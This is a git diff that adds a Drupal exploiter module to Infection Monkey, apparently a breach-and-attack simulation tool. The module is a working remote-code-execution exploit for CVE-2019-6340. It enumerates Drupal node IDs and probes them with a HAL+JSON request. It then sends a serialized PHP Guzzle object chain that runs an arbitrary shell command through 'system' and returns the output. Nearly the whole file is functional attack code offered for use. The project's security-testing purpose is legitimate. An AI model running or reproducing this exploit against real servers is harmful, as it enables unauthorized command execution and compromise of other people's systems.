diff --git a/monkey/infection_monkey/exploit/drupal.py b/monkey/infection_monkey/exploit/drupal.py new file mode 100644 index 000000000..31b7a4cd2 --- /dev/null +++ b/monkey/infection_monkey/exploit/drupal.py @@ -0,0 +1,175 @@ +""" +Remote Code Execution on Drupal server - CVE-2019-6340 +Implementation is based on: + https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a. +""" + +import logging +import re +import requests +from urllib.parse import urljoin, urlparse +from infection_monkey.exploit.web_rce import WebRCE + +__author__ = 'Ophir Harpaz' + +LOG = logging.getLogger(__name__) + + +def remove_port(url): + parsed = urlparse(url) + with_port = f'{parsed.scheme}://{parsed.netloc}' + without_port = re.sub(':[0-9]+$', '', with_port) + return without_port + + +def build_url(*args) -> str: + f = '' + for x in args: + f = urljoin(f, x) + return f + + +def check_drupal_cache(r: requests.Response) -> bool: + """ + Check if a response had the cache header. + """ + return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT' + + +def find_articles(base_url: str, lower: int = 1, upper: int = 10): + """ Find a target article that does not 404 and is not cached """ + articles = set() + while lower < upper: + u = build_url(base_url, str(lower)) + r = requests.get(u) + if r.status_code == 200: # found an article + articles.add(lower) + if check_drupal_cache(r): + LOG.info(f'Found a cached article at: {lower}, skipping') + lower += 1 + return articles + + +class DrupalExploiter(WebRCE): + _TARGET_OS_TYPE = ['linux', 'windows'] + _EXPLOITED_SERVICE = 'Drupal Server' + DRUPAL_PORTS = [[80, False], [443, True]] + + def __init__(self, host): + super(DrupalExploiter, self).__init__(host) + + def get_exploit_config(self): + """ + We override this function because the exploits requires a special extension in the URL, "node", + e.g. an exploited URL would be http://172.1.2.3:/node/3. + :return: the Drupal exploit config + """ + exploit_config = super(DrupalExploiter, self).get_exploit_config() + exploit_config['url_extensions'] = ['node/'] + return exploit_config + + def add_vulnerable_urls(self, potential_urls, stop_checking=False): + """ + We need a specific implementation of this function in order to add the URLs *with the node IDs*. + We therefore check, for every potential URL, all possible node IDs. + :param potential_urls: Potentially-vulnerable URLs + :param stop_checking: Stop if one vulnerable URL is found + :return: None (in-place addition) + """ + for url in potential_urls: + node_ids = find_articles(url) + if node_ids is None: + LOG.info('Could not find a Drupal node to attack') + continue + for node_id in node_ids: + node_url = build_url(url, str(node_id)) + if self.check_if_exploitable(node_url): + self.add_vuln_url(url) # Where is this used? + self.vulnerable_urls.append(node_url) + if stop_checking: + break + if not self.vulnerable_urls: + LOG.info("No vulnerable urls found") + + def check_if_exploitable(self, url): + """ + Check if a certain URL is exploitable. + We use this specific implementation (and not simply run self.exploit) because this function does not "waste" + a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic. + :param url: Drupal's URL and port + :return: Vulnerable URL if exploitable, otherwise False + """ + payload = { + "_links": { + "type": { + "href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}" + } + }, + "type": { + "target_id": "article" + }, + "title": { + "value": "My Article" + }, + "body": { + "value": "" + } + } + + response = requests.get(f'{url}?_format=hal_json', + json=payload, + headers={"Content-Type": "application/hal+json"}) + + if check_drupal_cache(response): + LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring') + return False + + return 'INVALID_VALUE does not correspond to an entity on this site' in response.text + + def exploit(self, url, command): + # pad a easy search replace output: + cmd = 'echo ---- && ' + command + base = remove_port(url) + payload = { + "link": [ + { + "value": "link", + "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000" + "GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"" + "close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:" + "{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";" + "s:|size|:\"|command|\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000" + "stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000" + "GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"" + "resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" + "".replace('|size|', str(len(cmd))).replace('|command|', cmd) + } + ], + "_links": { + "type": { + "href": f"{urljoin(base, '/rest/type/shortcut/default')}" + } + } + } + + LOG.info(payload) + + r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"}) + + if check_drupal_cache(r): + LOG.info(f'Exploiting {url} returned cache HIT, may have failed') + + if '----' not in r.text: + LOG.info('[warn] Command execution _may_ have failed') + + result = r.text.split('----')[-1] + LOG.info(f'Drupal exploit result = {result}') + return result + + def get_target_url(self): + """ + We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL. + Reusing the same URL eliminates its exploitability because of caching reasons :) + :return: vulnerable URL to exploit + """ + return self.vulnerable_urls.pop()